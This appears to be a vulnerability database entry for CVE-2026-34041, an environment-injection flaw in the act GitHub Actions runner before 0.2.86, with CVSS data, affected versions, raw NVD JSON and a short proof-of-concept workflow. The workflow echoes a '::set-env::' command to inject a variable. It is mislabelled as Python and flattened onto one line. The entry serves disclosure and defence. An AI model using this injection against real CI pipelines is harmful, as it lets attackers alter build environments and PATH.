Security Vulnerability Report
中文
CVE-2026-34041 CVSS 9.8 CRITICAL

CVE-2026-34041

Published: 2026-03-31 03:15:58
Last Modified: 2026-04-06 15:34:15
Source: [email protected]

Description

act is a project which allows for local running of github actions. Prior to version 0.2.86, act unconditionally processes the deprecated ::set-env:: and ::add-path:: workflow commands, which was disabled due to environment injection risks. When a workflow step echoes untrusted data to stdout, an attacker can inject these commands to set arbitrary environment variables or modify the PATH for all subsequent steps in the job. This issue has been patched in version 0.2.86.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nektos:act:*:*:*:*:*:*:*:* - VULNERABLE
act < 0.2.86

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
name: POC for CVE-2026-34041 on: push jobs: vulnerable_job: runs-on: ubuntu-latest steps: - name: Checkout uses: actions/checkout@v2 - name: Exploit Step (Echo malicious command) run: | # Injecting a malicious environment variable via stdout echo "::set-env:: name=MALICIOUS_VAR::pwned" echo "PATH has been modified or variable set" - name: Verification Step run: | # This step will see the injected variable echo "MALICIOUS_VAR is $MALICIOUS_VAR" if [ "$MALICIOUS_VAR" == "pwned" ]; then echo "VULNERABILITY CONFIRMED" fi

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34041", "sourceIdentifier": "[email protected]", "published": "2026-03-31T03:15:58.053", "lastModified": "2026-04-06T15:34:15.297", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "act is a project which allows for local running of github actions. Prior to version 0.2.86, act unconditionally processes the deprecated ::set-env:: and ::add-path:: workflow commands, which was disabled due to environment injection risks. When a workflow step echoes untrusted data to stdout, an attacker can inject these commands to set arbitrary environment variables or modify the PATH for all subsequent steps in the job. This issue has been patched in version 0.2.86."}, {"lang": "es", "value": "act es un proyecto que permite la ejecución local de acciones de GitHub. Antes de la versión 0.2.86, act procesa incondicionalmente los comandos de flujo de trabajo obsoletos ::set-env:: y ::add-path::, lo cual fue deshabilitado debido a riesgos de inyección de entorno. Cuando un paso de flujo de trabajo hace eco de datos no confiables a stdout, un atacante puede inyectar estos comandos para establecer variables de entorno arbitrarias o modificar la variable PATH para todos los pasos subsiguientes en el trabajo. Este problema ha sido parcheado en la versión 0.2.86."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nektos:act:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.2.86", "matchCriteriaId": "32DCBFDE-C658-4FEA-9386-FDF06A894809"}]}]}], "references": [{"url": "https://github.com/nektos/act/commit/0c739c8e39c41aa5a07665f732da9cab6df0097a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nektos/act/releases/tag/v0.2.86", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/nektos/act/security/advisories/GHSA-xmgr-9pqc-h5vw", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.